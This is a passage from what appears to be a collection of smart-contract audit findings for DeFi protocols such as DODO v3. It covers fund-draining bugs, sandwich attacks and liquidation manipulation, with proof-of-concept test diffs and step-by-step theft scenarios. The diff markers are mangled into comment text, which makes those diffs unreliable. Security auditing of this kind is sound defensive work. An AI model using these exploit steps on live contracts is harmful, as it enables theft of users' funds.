quote.lockedValues.mm -\\n ((quote.lockedValues.mm * filledAmount) / (LibQuote.quoteOpenAmount(quote))),\\n quote.lockedValues.lf -\\n ((quote.lockedValues.lf * filledAmount) / (LibQuote.quoteOpenAmount(quote)))\\n );\\n accountLayout.lockedBalances[quote.partyA].subQuote(quote).add(lockedValues);\\n accountLayout.partyBLockedBalances[quote.partyB][quote.partyA].subQuote(quote).add(\\n lockedValues\\n );\\n quote.lockedValues = lockedValues;\\n\\n (bool hasMadeProfit, uint256 pnl) = LibQuote.getValueOfQuoteForPartyA(\\n closedPrice,\\n filledAmount,\\n quote\\n );\\n if (hasMadeProfit) {\\n accountLayout.allocatedBalances[quote.partyA] += pnl;\\n accountLayout.partyBAllocatedBalances[quote.partyB][quote.partyA] -= pnl;\\n } else {\\n accountLayout.allocatedBalances[quote.partyA] -= pnl;\\n accountLayout.partyBAllocatedBalances[quote.partyB][quote.partyA] += pnl;\\n }\\n```\\n\\nIn Lines 157, 159, and 161 above, a malicious user could make the numerator smaller than the denominator (LibQuote.quoteOpenAmount(quote)), and the result will be zero due to a rounding error in Solidity.\\nIn this case, the `quote.lockedValues` will not decrease and will remain the same. As a result, the locked balance of the account will remain the same even though a certain amount of the position has been closed. This could cause the account's locked balance to be higher than expected, and the errors will accumulate if it happens many times.чWhen the `((quote.lockedValues.cva * filledAmount) / (LibQuote.quoteOpenAmount(quote)))` rounds down to zero, this means that a rounding error has occurred as the numerator is smaller than the denominator. 
The CVA, `filledAmount` or both might be too small.\\nConsider performing input validation against the `filledAmount` within the `fillCloseRequest` function to ensure that the provided values are sufficiently large and will not result in a rounding error.чWhen an account's locked balances are higher than expected, their available balance will be lower than expected. The available balance affects the amount that users can withdraw from their accounts. The \"silent\" increase in their locked values means that the amount that users can withdraw becomes lesser over time, and these amounts are lost due to the errors.ч```\\nFile: LibQuote.sol\\n function closeQuote(Quote storage quote, uint256 filledAmount, uint256 closedPrice) internal {\\n QuoteStorage.Layout storage quoteLayout = QuoteStorage.layout();\\n AccountStorage.Layout storage accountLayout = AccountStorage.layout();\\n\\n quote.modifyTimestamp = block.timestamp;\\n\\n LockedValues memory lockedValues = LockedValues(\\n quote.lockedValues.cva -\\n ((quote.lockedValues.cva * filledAmount) / (LibQuote.quoteOpenAmount(quote))),\\n quote.lockedValues.mm -\\n ((quote.lockedValues.mm * filledAmount) / (LibQuote.quoteOpenAmount(quote))),\\n quote.lockedValues.lf -\\n ((quote.lockedValues.lf * filledAmount) / (LibQuote.quoteOpenAmount(quote)))\\n );\\n accountLayout.lockedBalances[quote.partyA].subQuote(quote).add(lockedValues);\\n accountLayout.partyBLockedBalances[quote.partyB][quote.partyA].subQuote(quote).add(\\n lockedValues\\n );\\n quote.lockedValues = lockedValues;\\n\\n (bool hasMadeProfit, uint256 pnl) = LibQuote.getValueOfQuoteForPartyA(\\n closedPrice,\\n filledAmount,\\n quote\\n );\\n if (hasMadeProfit) {\\n accountLayout.allocatedBalances[quote.partyA] += pnl;\\n accountLayout.partyBAllocatedBalances[quote.partyB][quote.partyA] -= pnl;\\n } else {\\n accountLayout.allocatedBalances[quote.partyA] -= pnl;\\n accountLayout.partyBAllocatedBalances[quote.partyB][quote.partyA] += pnl;\\n }\\n```\\n 
-Consecutive symbol price updates can be exploited to drain protocol fundsчmediumчRepeatedly updating the symbol prices for the symbols used in Party A's positions mid-way through a liquidation while maintaining the same Party A's UPnL and total unrealized losses leads to more profits for Party B and effectively steals funds from the protocol.\\nThe `setSymbolsPrice` function in the `LiquidationFacetImpl` library is used to set the prices of symbols for Party A's positions. It is called by the liquidator, who supplies the `PriceSig memory priceSig` argument, which contains, among other values, the prices of the symbols as well as the `upnl` and `totalUnrealizedLoss` of Party A's positions.\\nParty A's `upnl` and `totalUnrealizedLoss` values are stored in Party A's liquidation details and enforced to remain the same for consecutive calls to `setSymbolsPrice` via the `require` statement in lines 90-95.\\nHowever, as long as those two values remain the same, the liquidator can set the prices of the symbols to the current market prices (fetched by the Muon app). If a liquidator liquidates Party A's open positions in multiple calls to `liquidatePositionsPartyA` and updates symbol prices in between, Party B potentially receives more profits than they should have.\\nThe git diff below contains a test case to demonstrate the following scenario:\\nGiven the following symbols:\\n`BTCUSDT`\\n`AAVEUSDT`\\nFor simplicity, we assume trading fees are 0.\\nParty A's allocated balance: `100e18 USDT`\\nParty A has two open positions with Party B:\\nID Symbol Order Type Position Type Quantity Price Total Value CVA LF MM Total Locked Leverage\\n1 BTCUSDT LIMIT LONG 100e18 1e18 100e18 25e18 25e18 0 50e18 2\\n2 AAVEUSDT LIMIT LONG 100e18 1e18 100e18 25e18 25e18 0 50e18 2\\nParty A's available balance: 100e18 - 100e18 = 0 USDT\\nNow, the price of `BTCUSDT` drops by 40% to `0.6e18 USDT`. 
Party A's `upnl` and `totalUnrealizedLoss` are now `-40e18 USDT` and `-40e18 USDT`, respectively.\\nParty A is insolvent and gets liquidated.\\nThe liquidator calls `setSymbolsPrice` for both symbols, setting the price of `BTCUSDT` to `0.6e18 USDT` and the price of `AAVEUSDT` to `1e18 USDT`. The `liquidationDetails` of Party A are as follows:\\nliquidationType: `LiquidationType.NORMAL`\\nupnl: `-40e18 USDT`\\ntotalUnrealizedLoss: `-40e18 USDT`\\ndeficit: 0\\nliquidationFee: `50e18 - 40e18 = 10e18 USDT`\\nThe liquidator first liquidates position 1 -> Party B receives `40e18 USDT` + `25e18 USDT` (CVA) = `65e18 USDT`\\nNow, due to a volatile market, the price of `AAVEUSDT` drops by 40% to `0.6e18 USDT`. The liquidator calls `setSymbolsPrice` again, setting the price of `AAVEUSDT` to `0.6e18 USDT`. `upnl` and `totalUnrealizedLoss` remain the same. Thus the symbol prices can be updated.\\nThe liquidator liquidates position 2 -> Party B receives `40e18 USDT` + `25e18 USDT` (CVA) = `65e18 USDT`\\nParty B received in total `65e18 + 65e18 = 130e18 USDT`, which is `30e18` USDT more than Party A's initially locked balances. 
Those funds are effectively stolen from the protocol and bad debt.\\nConversely, if both positions had been liquidated in the first call without updating the symbol prices in between, Party B would have received `40e18 + 25e18 = 65e18 USDT`, which Party A's locked balances covered.\\n\\nHow to run this test case:\\nSave git diff to a file named `exploit-liquidation.patch` and run with\\n```\\ngit apply exploit-liquidation.patch\\nnpx hardhat test\\n```\\nчConsider preventing the liquidator from updating symbol prices mid-way of a liquidation process.\\nOr, alternatively, store the number of Party A's open positions in the `liquidationDetails` and only allow updating the symbol prices if the current number of open positions is still the same, effectively preventing the liquidator from updating the symbol prices once a position has been liquidated.чA malicious liquidator can cooperate with Party B and by exploiting this issue during a volatile market, can cause Party B to receive more funds (profits, due to being the counterparty to Party A which faces losses) than it should and steal funds from the protocol.ч```\\ngit apply exploit-liquidation.patch\\nnpx hardhat test\\n```\\n -User can perform sandwich attack on withdrawReserves for profitчhighчA malicious user could listen to the mempool for calls to `withdrawReserves`, at which point they can perform a sandwich attack by calling `userDeposit` before the withdraw reserves transaction and then `userWithdraw` after the withdraw reserves transaction. They can accomplish this using a tool like flashbots and make an instantaneous profit due to changes in exchange rates.\\nWhen a user deposits or withdraws from the vault, the exchange rate of the token is calculated between the token itself and its dToken. 
As specified in an inline comment, the exchange rate is calculated like so:\\n```\\n// exchangeRate = (cash + totalBorrows -reserves) / dTokenSupply\\n```\\n\\nwhere `reserves = info.totalReserves - info.withdrawnReserves`. When the owner of the vault calls `withdrawReserves` the withdrawnReserves value increases, so the numerator of the above formula increases, and thus the exchange rate increases. An increase in exchange rate means that the same number of dTokens is now worth more of the underlying ERC20.\\nBelow is a diff to the existing test suite that demonstrates the sandwich attack in action:\\n```\\ndiff --git a/new-dodo-v3/test/DODOV3MM/D3Vault/D3Vault.t.sol b/new-dodo-v3/test/DODOV3MM/D3Vault/D3Vault.t.sol\\nindex a699162..337d1f5 100644\\n--- a/new-dodo-v3/test/DODOV3MM/D3Vault/D3Vault.t.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/new-dodo-v3/test/DODOV3MM/D3Vault/D3Vault.t.sol\\n@@ -233,6 // Add the line below\\n233,47 @@ contract D3VaultTest is TestContext {\\n assertEq(d3Vault.getTotalDebtValue(address(d3MM)), 1300 ether);\\n }\\n \\n// Add the line below\\n function testWithdrawReservesSandwichAttack() public {\\n// Add the line below\\n // Get dToken\\n// Add the line below\\n (address dToken2,,,,,,,,,,) = d3Vault.getAssetInfo(address(token2));\\n// Add the line below\\n \\n// Add the line below\\n // Approve tokens\\n// Add the line below\\n vm.prank(user1);\\n// Add the line below\\n token2.approve(address(dodoApprove), type(uint256).max);\\n// Add the line below\\n vm.prank(user2);\\n// Add the line below\\n token2.approve(address(dodoApprove), type(uint256).max);\\n// Add the line below\\n vm.prank(user2);\\n// Add the line below\\n D3Token(dToken2).approve(address(dodoApprove), type(uint256).max);\\n// Add the line below\\n\\n// Add the line below\\n // Set user quotas and mint tokens\\n// Add the line below\\n mockUserQuota.setUserQuota(user1, address(token2), 1000 ether);\\n// Add the line below\\n 
mockUserQuota.setUserQuota(user2, address(token2), 1000 ether);\\n// Add the line below\\n token2.mint(user1, 1000 ether);\\n// Add the line below\\n token2.mint(user2, 1000 ether);\\n// Add the line below\\n\\n// Add the line below\\n // User 1 deposits to allow pool to borrow\\n// Add the line below\\n vm.prank(user1);\\n// Add the line below\\n d3Proxy.userDeposit(user1, address(token2), 500 ether);\\n// Add the line below\\n token2.mint(address(d3MM), 100 ether);\\n// Add the line below\\n poolBorrow(address(d3MM), address(token2), 100 ether);\\n// Add the line below\\n\\n// Add the line below\\n vm.warp(365 days // Add the line below\\n 1);\\n// Add the line below\\n\\n// Add the line below\\n // Accrue interest from pool borrow\\n// Add the line below\\n d3Vault.accrueInterest(address(token2));\\n// Add the line below\\n uint256 reserves = d3Vault.getReservesInVault(address(token2));\\n// Add the line below\\n\\n// Add the line below\\n // User 2 performs a sandwich attack on the withdrawReserves call to make a profit\\n// Add the line below\\n vm.prank(user2);\\n// Add the line below\\n d3Proxy.userDeposit(user2, address(token2), 100 ether);\\n// Add the line below\\n vm.prank(vaultOwner);\\n// Add the line below\\n d3Vault.withdrawReserves(address(token2), reserves);\\n// Add the line below\\n uint256 dTokenBalance = D3Token(dToken2).balanceOf(user2);\\n// Add the line below\\n vm.prank(user2);\\n// Add the line below\\n d3Proxy.userWithdraw(user2, address(token2), dToken2, dTokenBalance);\\n// Add the line below\\n assertGt(token2.balanceOf(user2), 1000 ether);\\n// Add the line below\\n }\\n// Add the line below\\n\\n function testWithdrawReserves() public {\\n vm.prank(user1);\\n token2.approve(address(dodoApprove), type(uint256).max);\\n```\\nчThere are a couple of ways this type of attack could be prevented:\\nUser deposits could have a minimum lock time in the protocol to prevent an immediate withdraw. 
However the downside is the user will still profit in the same manner due to the fluctuation in exchange rates.\\nIncreasing reserves whilst accruing interest could have an equal and opposite decrease in token balance accounting. Every time reserves increase you are effectively taking token value out of the vault and \"reserving\" it for the protocol. Given the borrow rate is higher than the reserve increase rate, the exchange rate will continue to increase. I think something like the following would work (please note I haven't tested this):\\n```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/new// Remove the line below\\ndodo// Remove the line below\\nv3/contracts/DODOV3MM/D3Vault/D3VaultFunding.sol b/new// Remove the line below\\ndodo// Remove the line below\\nv3/contracts/DODOV3MM/D3Vault/D3VaultFunding.sol\\nindex 2fb9364..9ad1702 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/new// Remove the line below\\ndodo// Remove the line below\\nv3/contracts/DODOV3MM/D3Vault/D3VaultFunding.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/new// Remove the line below\\ndodo// Remove the line below\\nv3/contracts/DODOV3MM/D3Vault/D3VaultFunding.sol\\n@@ // Remove the line below\\n157,6 // Add the line below\\n157,7 @@ contract D3VaultFunding is D3VaultStorage {\\n uint256 compoundInterestRate = getCompoundInterestRate(borrowRatePerSecond, deltaTime);\\n totalBorrowsNew = borrowsPrior.mul(compoundInterestRate);\\n totalReservesNew = reservesPrior // Add the line below\\n (totalBorrowsNew // Remove the line below\\n borrowsPrior).mul(info.reserveFactor);\\n// Add the line below\\n info.balance = info.balance // Remove the line below\\n (totalReservesNew // Remove the line below\\n reservesPrior);\\n borrowIndexNew = borrowIndexPrior.mul(compoundInterestRate);\\n \\n accrualTime = currentTime;\\n@@ // Remove the line below\\n232,7 // Add the line below\\n233,7 @@ contract 
D3VaultFunding is D3VaultStorage {\\n uint256 cash = getCash(token);\\n uint256 dTokenSupply = IERC20(info.dToken).totalSupply();\\n if (dTokenSupply == 0) { return 1e18; }\\n// Remove the line below\\n return (cash // Add the line below\\n info.totalBorrows // Remove the line below\\n (info.totalReserves // Remove the line below\\n info.withdrawnReserves)).div(dTokenSupply);\\n// Add the line below\\n return (cash // Add the line below\\n info.totalBorrows).div(dTokenSupply);\\n } \\n \\n /// @notice Make sure accrueInterests or accrueInterest(token) is called before\\n```\\nчAn attacker can perform a sandwich attack on calls to `withdrawReserves` to make an instantaneous profit from the protocol. This effectively steals funds away from other legitimate users of the protocol.ч```\\n// exchangeRate = (cash + totalBorrows -reserves) / dTokenSupply\\n```\\n -Calls to liquidate don't write down totalBorrows which breaks exchange rateчhighчWhen a pool is liquidated, the `totalBorrows` storage slot for the token in question should be decremented by `debtToCover` in order to keep the exchange rate of the corresponding `pToken` correct.\\nWhen users call `liquidate` to `liquidate` a pool, they specify the amount of debt they want to cover. In the end this is used to write down the borrow amount of the pool in question:\\n```\\nrecord.amount = borrows - debtToCover;\\n```\\n\\nHowever, the `totalBorrows` of the token isn't written down as well (like it should be). The `finishLiquidation` method correctly writes down the `totalBorrows` state.чThe `liquidate` method should include the following line to write down the total borrow amount of the debt token being liquidated:\\n```\\ninfo.totalBorrows = info.totalBorrows - debtToCover;\\n```\\nчWhen a user calls `liquidate` to `liquidate` a pool, the exchange rate of the token (from its pToken) remains high (because the `totalBorrows` for the token isn't decremented). 
The result is that users that have deposited this ERC20 token are receiving a higher rate of interest than they should. Because this interest is not being covered by anyone the end result is that the last withdrawer from the vault will not be able to redeem their pTokens because there isn't enough of the underlying ERC20 token available. The longer the period over which interest accrues, the greater the incentive for LPs to withdraw early.ч```\\nrecord.amount = borrows - debtToCover;\\n```\\n -Anyone can sell other users' tokens as `fromToken`, and get the `toToken`'s themselves due to `decodeData.payer` is never checked.чhighчAnyone can sell other users' tokens as `fromToken`, and get the toToken's themselves due to `decodeData.payer` is never checked.\\nLet's examine the token-selling process and the transaction flow.\\nThe user will initiate the transaction with the `sellTokens()` method in the `D3Proxy.sol` contract, and provide multiple inputs like `pool`, `fromToken`, `toToken`, `fromAmount`, `data` etc.\\n```\\n// File: D3Proxy.sol\\n function sellTokens(\\n address pool,\\n address to,\\n address fromToken,\\n address toToken,\\n uint256 fromAmount,\\n uint256 minReceiveAmount,\\n bytes calldata data,\\n uint256 deadLine\\n ) public payable judgeExpired(deadLine) returns (uint256 receiveToAmount) {\\n if (fromToken == _ETH_ADDRESS_) {\\n require(msg.value == fromAmount, \"D3PROXY_VALUE_INVALID\");\\n receiveToAmount = ID3MM(pool).sellToken(to, _WETH_, toToken, fromAmount, minReceiveAmount, data);\\n } else if (toToken == _ETH_ADDRESS_) {\\n receiveToAmount =\\n ID3MM(pool).sellToken(address(this), fromToken, _WETH_, fromAmount, minReceiveAmount, data);\\n _withdrawWETH(to, receiveToAmount);\\n // multicall withdraw weth to user\\n } else {\\n receiveToAmount = ID3MM(pool).sellToken(to, fromToken, toToken, fromAmount, minReceiveAmount, data);\\n }\\n }\\n```\\n\\nAfter some checks, this method in the `D3Proxy.sol` will make a call to the `sellToken()` 
function in the pool contract (inherits D3Trading.sol). After this call, things that will happen in the pool contract are:\\nTransferring the toToken's to the \"to\" address (with _transferOut)\\nMaking a callback to `D3Proxy` contract to deposit fromToken's to the pool. (with IDODOSwapCallback(msg.sender).d3MMSwapCallBack)\\nChecking the pool balance and making sure that the fromToken's are actually deposited to the pool. (with this line: IERC20(fromToken).balanceOf(address(this)) - state.balances[fromToken] >= fromAmount)\\n```\\n// File: D3Trading.sol\\n// Method: sellToken()\\n108.--> _transferOut(to, toToken, receiveToAmount);\\n109.\\n110. // external call & swap callback\\n111.--> IDODOSwapCallback(msg.sender).d3MMSwapCallBack(fromToken, fromAmount, data);\\n112. // transfer mtFee to maintainer\\n113. _transferOut(state._MAINTAINER_, toToken, mtFee);\\n114.\\n115. require(\\n116.--> IERC20(fromToken).balanceOf(address(this)) - state.balances[fromToken] >= fromAmount,\\n117. Errors.FROMAMOUNT_NOT_ENOUGH\\n118. );\\n```\\n\\nThe source of the vulnerability is the `d3MMSwapCallBack()` function in the `D3Proxy`. 
It is called by the pool contract with the `fromToken`, `fromAmount` and `data` inputs to make a `fromToken` deposit to the pool.\\n```\\n//File: D3Proxy.sol \\n /// @notice This callback is used to deposit token into D3MM\\n /// @param token The address of token\\n /// @param value The amount of token need to deposit to D3MM\\n /// @param _data Any data to be passed through to the callback\\n function d3MMSwapCallBack(address token, uint256 value, bytes calldata _data) external override {\\n require(ID3Vault(_D3_VAULT_).allPoolAddrMap(msg.sender), \"D3PROXY_CALLBACK_INVALID\");\\n SwapCallbackData memory decodeData;\\n decodeData = abi.decode(_data, (SwapCallbackData));\\n--> _deposit(decodeData.payer, msg.sender, token, value);\\n }\\n```\\n\\nAn attacker can create a `SwapCallbackData` struct with any regular user's address, encode it and pass it through the `sellTokens()` function, and get the toToken's.\\nYou can say that `_deposit()` will need the payer's approval but the attackers will know that too. A regular user might have already approved the pool & proxy for the max amount. Attackers can easily check any token's allowances and exploit already approved tokens. Or they can simply watch the mempool and front-run any normal seller right after they approve but before they call the `sellTokens()`.чI would recommend to check if the `decodeData.payer == msg.sender` in the beginning of the `sellTokens()` function in `D3Proxy` contract. Because msg.sender will be the pool's address if you want to check it in the `d3MMSwapCallBack()` function, and this check will not be valid to see if the payer is actually the seller.\\nAnother option might be creating a local variable called \"seller\" and saving the msg.sender value when they first started the transaction. 
After that make `decodeData.payer == seller` check in the `d3MMSwapCallBack()`.чAn attacker can sell any user's tokens and steal their funds.ч```\\n// File: D3Proxy.sol\\n function sellTokens(\\n address pool,\\n address to,\\n address fromToken,\\n address toToken,\\n uint256 fromAmount,\\n uint256 minReceiveAmount,\\n bytes calldata data,\\n uint256 deadLine\\n ) public payable judgeExpired(deadLine) returns (uint256 receiveToAmount) {\\n if (fromToken == _ETH_ADDRESS_) {\\n require(msg.value == fromAmount, \"D3PROXY_VALUE_INVALID\");\\n receiveToAmount = ID3MM(pool).sellToken(to, _WETH_, toToken, fromAmount, minReceiveAmount, data);\\n } else if (toToken == _ETH_ADDRESS_) {\\n receiveToAmount =\\n ID3MM(pool).sellToken(address(this), fromToken, _WETH_, fromAmount, minReceiveAmount, data);\\n _withdrawWETH(to, receiveToAmount);\\n // multicall withdraw weth to user\\n } else {\\n receiveToAmount = ID3MM(pool).sellToken(to, fromToken, toToken, fromAmount, minReceiveAmount, data);\\n }\\n }\\n```\\n -When a D3MM pool repays all of the borrowed funds to vault using `D3Funding.sol repayAll`, an attacker can steal double the amount of those funds from vaultчhighчWhen a D3MM pool repays all of the borrowed funds to vault using D3Funding.sol repayAll, an attacker can steal double the amount of those funds from vault. 
This is because the balance of vault is not updated correctly in D3VaultFunding.sol _poolRepayAll.\\n`amount` should be added in `info.balance` instead of being subtracted.\\n```\\n function _poolRepayAll(address pool, address token) internal {\\n .\\n .\\n info.totalBorrows = info.totalBorrows - amount;\\n info.balance = info.balance - amount; // amount should be added here\\n .\\n .\\n }\\n```\\n\\nA `D3MM pool` can repay all of the borrowed funds from vault using the function D3Funding.sol repayAll which further calls D3VaultFunding.sol poolRepayAll and eventually D3VaultFunding.sol _poolRepayAll.\\n```\\n function repayAll(address token) external onlyOwner nonReentrant poolOngoing {\\n ID3Vault(state._D3_VAULT_).poolRepayAll(token);\\n _updateReserve(token);\\n require(checkSafe(), Errors.NOT_SAFE);\\n }\\n```\\n\\nThe vault keeps a record of borrowed funds and its current token balance.\\n`_poolRepayAll()` is supposed to:\\nDecrease the borrowed funds by the repaid amount\\nIncrease the token balance by the same amount #vulnerability\\nTransfer the borrowed funds from pool to vault\\nHowever, `_poolRepayAll()` is decreasing the token balance instead.\\n```\\n function _poolRepayAll(address pool, address token) internal {\\n .\\n .\\n .\\n .\\n\\n info.totalBorrows = info.totalBorrows - amount;\\n info.balance = info.balance - amount; // amount should be added here\\n\\n IERC20(token).safeTransferFrom(pool, address(this), amount);\\n\\n emit PoolRepay(pool, token, amount, interests);\\n }\\n```\\n\\nLet's say a vault has 100,000 USDC A pool borrows 20,000 USDC from vault\\nWhen the pool calls `poolRepayAll()`, the asset info in vault will change as follows:\\n`totalBorrows => 20,000 - 20,000 => 0` // info.totalBorrows - amount\\n`balance => 100,000 - 20,000 => 80,000` // info.balance - amount\\n`tokens owned by vault => 100,000 + 20,000 => 120,000 USDC` // 20,000 USDC is transferred from pool to vault (repayment)\\nThe difference of recorded balance (80,000) 
and actual balance (120,000) is `40,000 USDC`\\nAn attacker waits for the `poolRepayAll()` function call by a pool.\\nWhen `poolRepayAll()` is executed, the attacker calls D3VaultFunding.sol userDeposit(), which deposits 40,000 USDC in vault on behalf of the attacker.\\nAfter this, the attacker withdraws the deposited amount using D3VaultFunding.sol userWithdraw() and thus gains 40,000 USDC.\\n```\\n function userDeposit(address user, address token) external nonReentrant allowedToken(token) {\\n .\\n .\\n .\\n AssetInfo storage info = assetInfo[token];\\n uint256 realBalance = IERC20(token).balanceOf(address(this)); // check tokens owned by vault\\n uint256 amount = realBalance - info.balance; // amount = 120000-80000\\n .\\n .\\n .\\n IDToken(info.dToken).mint(user, dTokenAmount);\\n info.balance = realBalance;\\n\\n emit UserDeposit(user, token, amount);\\n }\\n```\\nчIssue When a D3MM pool repays all of the borrowed funds to vault using `D3Funding.sol repayAll`, an attacker can steal double the amount of those funds from vault\\nIn D3VaultFunding.sol _poolRepayAll, do the following changes:\\nCurrent code: `info.balance = info.balance - amount;`\\nNew (replace '-' with '+'): `info.balance = info.balance + amount;`чLoss of funds from vault. The loss will be equal to 2x amount of borrowed tokens that a D3MM pool repays using D3VaultFunding.sol poolRepayAllч```\\n function _poolRepayAll(address pool, address token) internal {\\n .\\n .\\n info.totalBorrows = info.totalBorrows - amount;\\n info.balance = info.balance - amount; // amount should be added here\\n .\\n .\\n }\\n```\\n -possible precision loss in D3VaultLiquidation.finishLiquidation() function when calculating realDebt because of division before multiplicationчmediumчfinishLiquidation() divides before multiplying when calculating realDebt.\\n```\\nuint256 realDebt = borrows.div(record.interestIndex == 0 ? 
1e18 : record.interestIndex).mul(info.borrowIndex);\\n```\\n\\nThere will be precision loss when calculating the realDebt because Solidity truncates values when dividing and dividing before multiplying causes precision loss.\\nValues that suffered from precision loss will be updated here\\n```\\n info.totalBorrows = info.totalBorrows - realDebt;\\n```\\nчdon't divide before multiplyingчIssue possible precision loss in D3VaultLiquidation.finishLiquidation() function when calculating realDebt because of division before multiplication\\nValues that suffered from precision loss will be updated here\\n```\\n info.totalBorrows = info.totalBorrows - realDebt;\\n```\\nч```\\nuint256 realDebt = borrows.div(record.interestIndex == 0 ? 1e18 : record.interestIndex).mul(info.borrowIndex);\\n```\\n -`D3VaultFunding.userWithdraw()` does not have mindTokenAmountчmediumч`D3VaultFunding.userWithdraw()` does not have mindTokenAmount, and uses `_getExchangeRate` directly. This is vulnerable to a sandwich attack.\\nAs we can see, `D3VaultFunding.userWithdraw()` does not have mindTokenAmount, and uses `_getExchangeRate` directly.\\n```\\nfunction userWithdraw(address to, address user, address token, uint256 dTokenAmount) external nonReentrant allowedToken(token) returns(uint256 amount) {\\n accrueInterest(token);\\n AssetInfo storage info = assetInfo[token];\\n require(dTokenAmount <= IDToken(info.dToken).balanceOf(msg.sender), Errors.DTOKEN_BALANCE_NOT_ENOUGH);\\n\\n amount = dTokenAmount.mul(_getExchangeRate(token));//@audit does not check amount value\\n IDToken(info.dToken).burn(msg.sender, dTokenAmount);\\n IERC20(token).safeTransfer(to, amount);\\n info.balance = info.balance - amount;\\n\\n // used for calculate user withdraw amount\\n // this function could be called from d3Proxy, so we need "user" param\\n // In the meantime, some users may hope to use this function directly,\\n // to prevent these users fill "user" param with wrong addresses,\\n // we use "msg.sender" param 
to check.\\n emit UserWithdraw(msg.sender, user, token, amount);\\n }\\n```\\n\\nAnd the `_getExchangeRate()` result is about `cash` , `info.totalBorrows`, info.totalReserves,info.withdrawnReserves,dTokenSupply,This is vulnerable to a sandwich attack leading to huge slippage\\n```\\nfunction _getExchangeRate(address token) internal view returns (uint256) {\\n AssetInfo storage info = assetInfo[token];\\n uint256 cash = getCash(token);\\n uint256 dTokenSupply = IERC20(info.dToken).totalSupply();\\n if (dTokenSupply == 0) { return 1e18; }\\n return (cash + info.totalBorrows - (info.totalReserves - info.withdrawnReserves)).div(dTokenSupply);\\n } \\n```\\nчAdd `mindTokenAmount` parameter for `userWithdraw()` function and check if `amount < mindTokenAmount`чThis is vulnerable to a sandwich attack.ч```\\nfunction userWithdraw(address to, address user, address token, uint256 dTokenAmount) external nonReentrant allowedToken(token) returns(uint256 amount) {\\n accrueInterest(token);\\n AssetInfo storage info = assetInfo[token];\\n require(dTokenAmount <= IDToken(info.dToken).balanceOf(msg.sender), Errors.DTOKEN_BALANCE_NOT_ENOUGH);\\n\\n amount = dTokenAmount.mul(_getExchangeRate(token));//@audit does not check amount value\\n IDToken(info.dToken).burn(msg.sender, dTokenAmount);\\n IERC20(token).safeTransfer(to, amount);\\n info.balance = info.balance - amount;\\n\\n // used for calculate user withdraw amount\\n // this function could be called from d3Proxy, so we need \"user\" param\\n // In the meantime, some users may hope to use this function directly,\\n // to prevent these users fill \"user\" param with wrong addresses,\\n // we use \"msg.sender\" param to check.\\n emit UserWithdraw(msg.sender, user, token, amount);\\n }\\n```\\n -D3Oracle will return the wrong price if the Chainlink aggregator returns price outside min/max rangeчmediumчChainlink oracles have a min and max price that they return. 
If the price goes below the minimum price the oracle will not return the correct price but only the min price. Same goes for the other extremity.\\nBoth `getPrice()` and `getOriginalPrice()` only check `price > 0`, not whether the price is within the correct range\\n```\\n(uint80 roundID, int256 price,, uint256 updatedAt, uint80 answeredInRound) = priceFeed.latestRoundData();\\nrequire(price > 0, "Chainlink: Incorrect Price");\\nrequire(block.timestamp - updatedAt < priceSources[token].heartBeat, "Chainlink: Stale Price");\\nrequire(answeredInRound >= roundID, "Chainlink: Stale Price");\\n```\\nчCheck the latest answer against reasonable limits and/or revert in case you get a bad price\\n```\\n require(price >= minAnswer && price <= maxAnswer, "invalid price");\\n```\\nчThe wrong price may be returned in the event of a market crash. The functions with the issue are used in `D3VaultFunding.sol`, `D3VaultLiquidation.sol` and `D3UserQuota.sol`ч```\\n(uint80 roundID, int256 price,, uint256 updatedAt, uint80 answeredInRound) = priceFeed.latestRoundData();\\nrequire(price > 0, "Chainlink: Incorrect Price");\\nrequire(block.timestamp - updatedAt < priceSources[token].heartBeat, "Chainlink: Stale Price");\\nrequire(answeredInRound >= roundID, "Chainlink: Stale Price");\\n```\\n -parseAllPrice does not support the tokens whose decimal is greater than 18чmediumч
Since `buyToken / sellToken` is dependent on `parseAllPrice`, so users can't trade tokens larger than 18 decimal, but DODOv3 is intended to be compatible with all standard ERC20, which is not expected.\\n```\\n // fix price decimal\\n if (tokenDecimal != 18) {\\n uint256 fixDecimal = 18 - tokenDecimal;\\n bidDownPrice = bidDownPrice / (10 ** fixDecimal);\\n bidUpPrice = bidUpPrice / (10 ** fixDecimal);\\n askDownPrice = askDownPrice * (10 ** fixDecimal);\\n askUpPrice = askUpPrice * (10 ** fixDecimal);\\n }\\n```\\n\\nIf `tokenDecimal > 18`, `18 - tokenDecimal` will revertчFix decimal to 36 instead of 18чDODOv3 is not compatible the tokens whose decimal is greater than 18, users can't trade them.ч```\\n // fix price decimal\\n if (tokenDecimal != 18) {\\n uint256 fixDecimal = 18 - tokenDecimal;\\n bidDownPrice = bidDownPrice / (10 ** fixDecimal);\\n bidUpPrice = bidUpPrice / (10 ** fixDecimal);\\n askDownPrice = askDownPrice * (10 ** fixDecimal);\\n askUpPrice = askUpPrice * (10 ** fixDecimal);\\n }\\n```\\n -Wrong assignment of `cumulativeBid` for RangeOrder state in getRangeOrderState functionчmediumчWrong assignment of `cumulativeBid` for RangeOrder state\\nIn `D3Trading`, the `getRangeOrderState` function is returning RangeOrder (get swap status for internal swap) which is assinging wrong toTokenMMInfo.cumulativeBid which suppose to be `cumulativeBid` not `cumulativeAsk`\\nThe error lies in the assignment of `roState.toTokenMMInfo.cumulativeBid`. Instead of assigning `tokenCumMap[toToken].cumulativeAsk`, it should be assigning `tokenCumMap[toToken].cumulativeBid`.\\n```\\nFile: D3Trading.sol\\n roState.toTokenMMInfo.cumulativeBid =\\n allFlag (toTokenIndex) & 1 == 0 ? 
